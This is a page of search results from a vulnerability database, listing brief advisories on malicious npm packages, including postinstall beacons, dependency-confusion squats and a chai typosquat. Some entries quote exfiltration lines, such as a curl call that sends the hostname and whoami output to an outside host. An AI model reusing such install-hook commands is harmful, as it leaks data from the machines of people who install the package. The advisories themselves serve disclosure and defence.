CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

show all

252309 matches found

Linux Distros Unpatched Vulnerability : CVE-2025-71330

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - image-size through 2.0.2 contains a denial of service vulnerability that allows remote attackers to permanently block the Node.js event loop by supplying a...

8.7CVSS5.7AI score0.00416EPSS

Exploits1References2

OSSF Malicious Packages•added 4 days ago•7 views

Malicious code in ltidiconf (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a4ca306052ea5224831743daec9d3944fadff8cb4a7211e980be7669a739d00d [email protected] is an empty wrapper package index.js is module.exports = ;, empty author/description, inflated 99.9.1 version whose sole effect on...

5.5AI score

Exploits0References1

OSSF Malicious Packages•added 4 days ago•11 views

Malicious code in npm-sandbox-ping-c8f2a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5401a81d56283c310efebfe29af19c3e3fa331667f40adeed71a54627adc877 Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes on every install. Bundled scripts beacon6.js and...

5.4AI score

Exploits0References1

OSSF Malicious Packages•added 4 days ago•8 views

Malicious code in npm-sandbox-research-c5d6 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e7dd3f64f94b15f73c62c5733a5910802ff22adc514e0eb08e153817fcd4158b The package declares a postinstall hook "postinstall": "node run.js" that executes automatically on npm install. The shipped beacon scripts...

5.5AI score

Exploits0References1

OSSF Malicious Packages•added 4 days ago•12 views

Malicious code in npm-sandbox-research-d7e8 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3ff31cbf7e2e36cef422933472638912cd6ee6652ece9b03d11faa98b70d13e9 Package declares a postinstall lifecycle hook "postinstall": "node run.js" that auto-executes on install. The package ships beacon scripts beacon12.j...

5.3AI score

Exploits0References1

OSSF Malicious Packages•added 5 days ago•8 views

Malicious code in patientdocuments (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56c5ab4dc6470deaebe29f4851edb91bc5d5704e9f9578a91e238490708c007b package.json declares a preinstall lifecycle script that runs wget --quiet...

5.7AI score

Exploits0References1

OSV•added 5 days ago•9 views

MAL-2026-5750 Malicious code in mailconfirmer (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfb184ffa15fd011b84658a6b5cd68582e78827258a8373f0da1ef34248bfb09 The package advertises itself as an email-confirmation utility, but index.js contains only no-op stubs that console.log demo messages. The real...

5.6AI score

Exploits0References29

OSSF Malicious Packages•added 5 days ago•11 views

Malicious code in mailconfirmer (npm)

5.6AI score

Exploits0References29

OSV•added 5 days ago•8 views

MAL-2026-5751 Malicious code in oh-my-ashclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

5.5AI score

Exploits0References1

OSSF Malicious Packages•added 5 days ago•10 views

Malicious code in chai-utils-test (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 64edd573a9e5fdef8dcde78f5b0c9fa00521f232b886be838104741d1e0535f7 Package name 'chai-utils-test' impersonates the popular 'chai' assertion library and ships a cloned chai source tree. The declared main index.js call...

5.5AI score

Exploits0References6

OSV•added 5 days ago•10 views

MAL-2026-5748 Malicious code in chai-utils-test (npm)

5.5AI score

Exploits0References6

OSSF Malicious Packages•added 5 days ago•9 views

Malicious code in @achuthvp/postinstall-poc (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c3dc0d7b5fc216ae117dda9c492a6bbdff46e49ab53f069c2d525dab001bcdb9 package.json declares scripts.postinstall = node postinstall.js. On every npm install, postinstall.js runs execSync'id' and POSTs a JSON body...

5.4AI score

Exploits0References2

OSV•added 5 days ago•8 views

MAL-2026-5741 Malicious code in @achuthvp/postinstall-poc (npm)

5.4AI score

Exploits0References2

OSSF Malicious Packages•added 5 days ago•11 views

Malicious code in environment-gate (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1 The package's only export, gate, performs an HTTP GET to a base64-obfuscated URL https://www.jsonkeeper.com/b/VKUNI and passes the response body...

6AI score

Exploits0References1

OSV•added 5 days ago•9 views

MAL-2026-5743 Malicious code in environment-gate (npm)

6AI score

Exploits0References1

OSV•added 5 days ago•8 views

MAL-2026-5742 Malicious code in axl-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6fbc071f0ee6323c87fa6be049a9b151217f7146605ef89b4494f7ef07e7d534 [email protected] is a dependency-confusion squat targeting an internal package name. package.json declares a postinstall hook node beacon.js that fires...

5.6AI score

Exploits0References1

OSSF Malicious Packages•added 5 days ago•10 views

Malicious code in loadninja-shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46 [email protected] is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node...

5.3AI score

Exploits0References1

OSV•added 5 days ago•1 views

ROOT-APP-NPM-GHSA-VVJJ-XCJG-GR5G GHSA-vvjj-xcjg-gr5g in @rootio/nodemailer - Patched by Root

Root has patched GHSA-vvjj-xcjg-gr5g in the @rootio/nodemailer package for Root:npm. Multiple fixed versions available...

4.9CVSS5.8AI score

Exploits0

OSSF Malicious Packages•added 5 days ago•9 views

Malicious code in easy-time666 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57bc31746af3bff6006bfe2da34cd0fb223a4bd9e867abddd172be5018821c22 package.json declares a postinstall hook that runs curl http://npm.wdf1.eyes.sh/pre?h=$hostname&u=&whoami over plain HTTP on every npm install, leaki...

5.4AI score

Exploits0References1

OSV•added 5 days ago•9 views

ROOT-APP-NPM-CVE-2026-27903 CVE-2026-27903 in @rootio/minimatch - Patched by Root

Root has patched CVE-2026-27903 in the @rootio/minimatch package for Root:npm. Multiple fixed versions available...

7.5CVSS5.9AI score0.00499EPSS

Exploits1

Rows per page

Query Builder

Family

Bulletin Type

Min CVSS Score

Date

Order by